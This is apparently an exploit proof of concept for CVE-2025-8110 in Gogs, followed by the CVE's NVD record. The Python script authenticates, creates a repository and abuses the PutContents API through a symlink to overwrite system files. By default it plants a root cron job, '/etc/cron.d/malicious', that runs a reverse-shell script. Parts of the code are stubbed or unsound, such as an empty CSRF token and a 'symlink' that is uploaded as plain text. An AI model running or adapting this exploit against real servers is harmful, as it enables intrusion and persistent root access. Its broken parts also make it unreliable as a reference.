CVE-2025-8110

#!/usr/bin/env python3 # CVE-2025-8110 PoC - Gogs PutContents API Symlink Exploitation # This PoC demonstrates exploiting improper symlink handling in Gogs PutContents API import requests import argparse import json import base64 import hashlib class GogsExploit: def __init__(self, target_url, username, password): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.token = None def login(self): """Authenticate to Gogs and obtain access token""" login_url = f"{self.target_url}/user/login" data = { 'user_name': self.username, 'password': self.password, '_csrf': self.get_csrf_token(login_url) } response = self.session.post(login_url, data=data, allow_redirects=False) return response.status_code in [200, 302, 303] def get_csrf_token(self, url): """Extract CSRF token from page""" response = self.session.get(url) # In real attack, parse CSRF token from response return '' def create_repo(self, repo_name): """Create a new repository""" create_url = f"{self.target_url}/repo/create" data = { 'repo_name': repo_name, '_csrf': self.get_csrf_token(f"{self.target_url}/repo/create") } response = self.session.post(create_url, data=data) return repo_name in response.text def create_symlink(self, repo_name, symlink_path, target_path): """Create a symlink file pointing to target path""" # Create symlink content symlink_content = f"../{target_path}" if '..' not in target_path else target_path api_url = f"{self.target_url}/api/v1/repos/{self.username}/{repo_name}/contents" data = { 'content': base64.b64encode(symlink_content.encode()).decode(), 'path': symlink_path, 'message': f'Create symlink to {target_path}' } response = self.session.post(api_url, json=data) return response.status_code in [200, 201] def write_via_putcontents(self, repo_name, symlink_path, content): """Write content through symlink using PutContents API""" api_url = f"{self.target_url}/api/v1/repos/{self.username}/{repo_name}/contents/{symlink_path}" data = { 'content': base64.b64encode(content.encode()).decode(), 'message': 'Write malicious content via symlink' } response = self.session.put(api_url, json=data) return response.status_code in [200, 201] def exploit(self, repo_name, target_file, malicious_content): """Execute exploit chain""" print(f"[*] Logging into Gogs as {self.username}...") if not self.login(): print("[-] Login failed") return False print("[+] Login successful") print(f"[*] Creating repository: {repo_name}") if not self.create_repo(repo_name): print("[-] Repository creation failed") return False print("[+] Repository created") print(f"[*] Creating symlink to {target_file}") symlink_name = f"link_to_{hashlib.md5(target_file.encode()).hexdigest()[:8]}" if not self.create_symlink(repo_name, symlink_name, target_file): print("[-] Symlink creation failed") return False print("[+] Symlink created") print(f"[*] Writing malicious content to {target_file} via symlink") if not self.write_via_putcontents(repo_name, symlink_name, malicious_content): print("[-] Content write failed") return False print("[+] Malicious content written successfully") print("[!] Exploit completed - RCE achieved via symlink attack") return True def main(): parser = argparse.ArgumentParser(description='CVE-2025-8110 Gogs Symlink RCE Exploit') parser.add_argument('--url', required=True, help='Target Gogs URL') parser.add_argument('--user', required=True, help='Username') parser.add_argument('--pass', dest='password', required=True, help='Password') parser.add_argument('--target', default='/etc/cron.d/malicious', help='Target file path') parser.add_argument('--content', default='* * * * * root /tmp/revshell.sh', help='Malicious content') parser.add_argument('--repo', default='exploit_repo', help='Repository name') args = parser.parse_args() exploit = GogsExploit(args.url, args.user, args.password) exploit.exploit(args.repo, args.target, args.content) if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-8110", "sourceIdentifier": "9947ef80-c5d5-474a-bbab-97341a59000e", "published": "2025-12-10T14:16:19.847", "lastModified": "2026-01-20T13:47:34.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Symbolic link handling in the PutContents API in Gogs allows Local Execution of Code."}], "metrics": {"cvssMetricV40": [{"source": "9947ef80-c5d5-474a-bbab-97341a59000e", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "ATTACKED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "cisaExploitAdd": "2026-01-12", "cisaActionDue": "2026-02-02", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Gogs Path Traversal Vulnerability", "weaknesses": [{"source": "9947ef80-c5d5-474a-bbab-97341a59000e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.13.3", "matchCriteriaId": "CC3C1E01-690F-4BEB-8969-16883D7F12A5"}]}]}], "references": [{"url": "http://wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit", "source": "9947ef80-c5d5-474a-bbab-97341a59000e", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/11/3", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/11/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/17/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/18/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/18/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "https://github.com/gogs/gogs/commit/553707f3fd5f68f47f531cfcff56aa3ec294c6f6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Patch"]}, {"url": "https://github.com/gogs/gogs/pull/8078", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-8110", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory", "US Government Resource"]}]}}